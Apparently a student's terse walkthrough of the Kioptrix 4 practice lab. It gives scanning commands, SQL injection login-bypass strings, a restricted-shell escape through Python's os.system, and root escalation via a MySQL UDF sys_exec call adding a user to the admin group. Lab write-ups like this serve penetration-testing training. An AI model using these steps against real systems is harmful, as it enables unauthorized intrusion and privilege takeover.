Kioptrix4

netdiscover -r 192.168.0.0/24
nmap -sS -sV -T4 -AO 192.168.0.4
nikto -host 192.168.0.4 -port 80 -output kioptrix4.html
 enum4linux -a 192.168.0.4 | tee e4l.txt  nmap --script smb-enum-users 192.168.0.4 -oA nmapenumusers.txt
  nmap --script smb-enum-shares 192.168.0.4 -oA nmapenumshares.txt
  dirb http://192.168.0.4 /usr/share/wordlists/dirb/common.txt | tee dirb.txt
  vi dirb.txt
Knowing that the directory of john existed, based on the results from dirb, I directly opened john/john.php in browser

 Using the manual process to determine if the web site was vulnerable to SQL Injection, I simply added a ‘ to the Username and Password fields and then clicked the Login button.
Interesting, I discovered that there was a MySQL database and that the page of checklogin.php was being utilized.
Next, I decided to use the discovered SMB usernames with the blah’ OR 1 = 1 — -
or 'OR'1'='1
SQLInjection within the Password field.
 
ssh john@192.168.0.3
the account has limited access on shell
 

Knowing that Python was usually installed on Ubuntu by default, I decided to play around with the following example from the SANS documentation:

python: exit_code = os.system(‘/bin/sh’) output = os.popen(‘/bin/sh’).read()

After some time, I issued the echo command with the Python OS module of System in order to call /bin/bash.

echo os.system('/bin/bash');

tried sudo su

but no luck

cat /var/www/checklogin.php

found root password of mysql that is null

checked mysql is running with root or with different crendential

ps ef | grep mysql     it was running with root

  MySQL had a module called UDF (User-Defined Function). So, I issued the locate udf command to see if the library was installed on the system.

mysql -u root

select * from mysql.func; 

select sys_exec('usermod -a -G admin  john');

exit

sudo su

boom...u have root!!

read cat /root/congrats.txts